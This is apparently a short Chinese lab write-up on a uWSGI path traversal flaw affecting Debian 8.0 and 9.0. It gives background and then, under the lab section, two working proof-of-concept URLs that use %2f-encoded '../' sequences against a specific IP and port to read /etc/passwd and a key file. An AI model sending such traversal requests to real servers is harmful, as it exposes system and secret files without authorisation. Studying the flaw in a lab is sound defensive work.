01 背景介绍
uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。
02 影响版本
Debian Debian_linux:8.0
Debian Debian_linux:9.0
03 利用方法
…/…/…/…/…可以访问到服务器的根目录
04 靶场
1.所以中间的"/“必须换成”%2f".
poc:
http://219.153.49.228:44857/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
2.查看key.txt
http://219.153.49.228:44857/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fkey.txt
版权声明:本文为qq_45158261原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。